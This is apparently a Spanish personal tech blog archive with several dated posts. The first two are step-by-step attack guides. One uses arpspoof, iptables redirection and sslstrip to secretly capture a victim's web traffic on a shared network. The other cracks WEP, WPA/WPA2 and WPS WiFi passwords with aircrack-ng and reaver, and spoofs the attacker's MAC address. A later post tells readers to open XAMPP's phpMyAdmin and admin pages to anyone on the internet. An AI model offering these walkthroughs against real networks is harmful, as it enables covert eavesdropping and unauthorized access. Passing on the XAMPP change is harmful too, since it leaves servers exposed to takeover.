miércoles, 20 de noviembre de 2013

ESPIANDO EL TRAFICO HTTP

hola
esta prueba la realice con el cd live de kali-linux y lo que necesitamos para espiar el trafico http es los siguiente:

  1. sslstrip (sudo apt-get install sslstrip)
  2. fping (sudo apt-get install fping)
  3. python (lo incluye por defecto)
iniciemos con el tutorial:

1) lo que debemos saber es como esta configurada la red con el siguiente comando
       ifconfig
miramos cual es la dirección ip que nos dio el router al que estamos conectamos por ejemplo: 192.168.0.100
2) ahora buscamos las otras pc's que estan conectadas con el siguiente comando:
      fping -a -g 192.168.0.1 192.168.0.254 > hosts
3) esperamos a que termine para luego leer los hosts con el siguiente comando
     cat hosts
lo que sigue lo debemos de hacer en tres terminales
TERMINAL 1:
1) accedemos como root o super usuario con el siguiente comando
     sudo -sH
2) activamos el ip forwarding con el siguiente comando
     echo 1 > /proc/sys/net/ipv4/ip_forward
3) ejecutamos el comando arpspoof -i <interfaz> -t <victima> <puerta de enlace> con el siguiente comando:
     arpspoof -i wlan0 -t 192.168.0.104 192.168.0.1
donde 192.168.0.1 es la dirección del router que da el internet a la cual estoy conectado y 192.168.0.104 es la ip del computador de la victima
TERMINAL 2:
1) redireccionamos el trafico http del puerto 80 al puerto 8080 con el siguiente comando
     sudo iptables -t nat -A PREROUTING -p tcp --detination-port 80 -j REDIRECT --to-ports 8080
2) ejecutamos sslstrip indicandole -w que lo guarde en un archivo y -l que escuche por el puerto 8080 con el siguiente comando
    sslstrip -w cap -l 8080
TERMINAL 3:
1) finalmente el comando tail para leer la informacion
    tail -f cap
listo ya esta
con esto no se dan cuenta de que los están espiando

lunes, 25 de marzo de 2013

COMO METERSE A UNA RED WIFI

PARA UNA RED WIFI CON SEGURIDAD WEP

Usando un live-cd de linux BackTrack 5, lo primero que debemos hacer es abrir una terminal de comandos y escribir lo siguiente:
airmon-ng
con este comando podemos ver las interfaces de red que tenemos instalados en nuestro equipo, por lo general la que utilizamos es la wlan0.
ya que conocemos el nombre de nuestra interfaz procedemos a ponerla en modo monitor escribiendo lo siguiente:
airmon-ng start wlan0
ya tenemos nuestra tarjeta en modo monitor y como se dan cuenta "mon0" es el nombre de la interfaz en modo monitor.
ahora escaneamos las redes disponibles con el siguiente comando:
airodump-ng mon0
con este comando nos empieza a mostrar las redes disponibles, para seleccionar la red de la victima tenemos que pulsar ctrl+c.
luego abrimos otra ventana de terminal para capturar la red de la victima y escribimos el siguiente comando:
airodump-ng -w captura -c 11 --bssid 00:11:22:33:44:55 mon0
donde:

-w: especifica el nombre del archivo donde se guarda la captura de datos
-c: especifica el canal de la red
--bssid: especifica la MAC del punto de acceso
-mon0: especifica la interfaz de la tarjeta de red en modo monitoreo

ahora abrimos otra terminal y escribimos lo siguiente:
aireplay-ng -1 0 -a 00:11:22:33:44:55 mon0
esto es para asociar su pc con la red victima

ahora pasamos a inyectar paquetes a la red victima para esto escribimos lo siguiente:
aireplay-ng -3 -b 00:11:22:33:44:55 mon0
con esto enviaremos y recibiremos paquetes, ahora vamos a la segunda terminal y en la columna #Data se incrementara rapidamente y solo tenemos que esperar a que llegue a 30.000 datos para poder desencriptar la clave.
cuando llegue a los 30.000 datos abrimos una ultima terminal y escribimos lo siguiente:
aircrack-ng captura-01.cap
donde:
-captura: es el nombre de archivo que le dimos para capturar la red de la victima
y listo, cuando le den enter les va a salor algo como
Key Found (00:09:7F:...)

aqui les dejo el video donde lo encontre



PARA UNA RED WIFI CON SEGURIDAD WPA O WPA2

Usando un live-cd de linux BackTrack 5, lo primero que debemos hacer es abrir una terminal de comandos y escribir lo siguiente:
airmon-ng
con este comando podemos ver las interfaces de red que tenemos instalados en nuestro equipo, por lo general la que utilizamos es la wlan0.
ya que conocemos el nombre de nuestra interfaz procedemos a ponerla en modo monitor escribiendo lo siguiente:
airmon-ng start wlan0
ya tenemos nuestra tarjeta en modo monitor y como se dan cuenta "mon0" es el nombre de la interfaz en modo monitor.
ahora escaneamos las redes disponibles con el siguiente comando:
airodump-ng mon0
con este comando nos empieza a mostrar las redes disponibles, para seleccionar la red de la victima tenemos que pulsar ctrl+c.
luego abrimos otra ventana de terminal para capturar el handshake de la red de la victima y escribimos el siguiente comando:
airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura mon0
ahora usaremos aireplay-ng para desautenticar un cliente conectado escribiendo el siguiente comando
aireplay-ng -0 1 -a MAC_DEL_AP -c MAC_DEL_CLIENTE mon0
despues usamos aircrack para desencriptar la clave con el siguiente comando
aircrack-ng -w diccionario.lst -b MAC_DEL_AP captura*.cap

en la siguiente pagina encontraras la explicacion del uso de estas herramientas de un modo mas detallado
http://foro.undersecurity.net/read.php?80,928

OTRA MANERA DE INGRESAR A UNA WPA O WPA2

otra manera de sacar la clave en una red WIFI protegida con WPA o WPA2 es utilizando el comando "reaver" de la siguiente manera:

1) Actualizar los paquetes del S.O.
apt-get update
2) Instalamos el paquete "reaver" con el comando:
apt-get install reaver
3) Iniciamos el modo monitor con el comando:
airmon-ng start wlan0
4) Iniciamos la escucha de las redes a las que se les puede hacer el ataque de pines(reaver) asi:
wash -i mon0
5) En otra ventana hacemos el ataque con el comando:
reaver -i mon0 -b MAC_DEL_AP -c CANAL_DEL_AP -vv
listo es solo cuestion de tiempo para que nos diga cual es la clave(PSK)

PARA CAMBIAR LA MAC

Para cambiar la MAC usaremos el comando "macchanger" de la siguiente manera:

1) desactivar la antena wifi con:
ifconfig mon0 down
2) cambiar la mac con:
macchanger -m 00:11:22:33:44:55 mon0
3) activamos de nuevo la antena wifi con:
ifconfig mon0 up 

sábado, 5 de enero de 2013

MEJORAR RESOLUCION DE WINDOWS 8

Para forzar a Windows 8 a utilizar resoluciones de 1024X768 debes seguir estos simples pasos

1. Vamos a REGEDIT (tecla Windows+R y tecleamos regedit)
2. Buscaremos la entrada "Display1_DownScalingSupported" presionando ctrl+f
3. Seleccionamos esta entrada y le cambiamos el valor 0 por 1 y damos enter
4. Presionamos la tecla F3 para buscar la siguiente entrada y también le cambiamos el valor 0 por 1
5. Cuando acaben reinician la PC
6. Y listo ya pueden cambiar la resolución a 1024X768

miércoles, 26 de diciembre de 2012

PAGINA WEB XAMPP EN INTERNET

Para que nuestro XAMPP se vea desde Internet lo que debemos hacer es lo siguiente:
1. tener instalado el XAMPP (mi versión es la 1.8.1)
2. ir al directorio C:\xampp\apache\conf\extra
3. abrir el archivo httpd-xampp.conf con wordpad o notepad
4. bajar todo hasta donde dice


#
# New XAMPP security concept
#
<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))">
Order deny,allow
Deny from all
Allow from 127.0.0.0/8
ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
</LocationMatch>

y borrarle donde dice "Order deny,allow" y "Deny from all"


5. ahora cambiarle la direccion "127.0.0.0/8" por all para que quede asi


#
# New XAMPP security concept
#
<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))">
Allow from all
ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
</LocationMatch>


6. guarda el documento y reinicia todos los servicios del XAMPP

 ademas tenemos que configurar nuestro router para que se redireccione a nuestro XAMPP para eso debemos crearle una regla al router donde le damos



listo ahora pueden acceder a tu XAMPP desde Internet usando tu dirección ip publica

lunes, 29 de octubre de 2012

COMO SABER SI TU PC ES HACKEADA O ESTA INFECTADA

Lo primero que debes hacer es ir al editor de comandos de windows
           ingresar al boton inicio - ejecutar y escribes cmd
ahora escribes el siguiente comando
            netstat -ano
copiamos los PID que digan ESTABLISHED para luego buscarlas en el listado de tareas que tiene el sistema con la siguiente orden
           tasklist
y te sale algo como esto
y ahora busca los PID para ver que programas que tienen establecida una conexión en Internet  puede ser un programa que te falte por cerrar o un programa que esta enviando tu información a Internet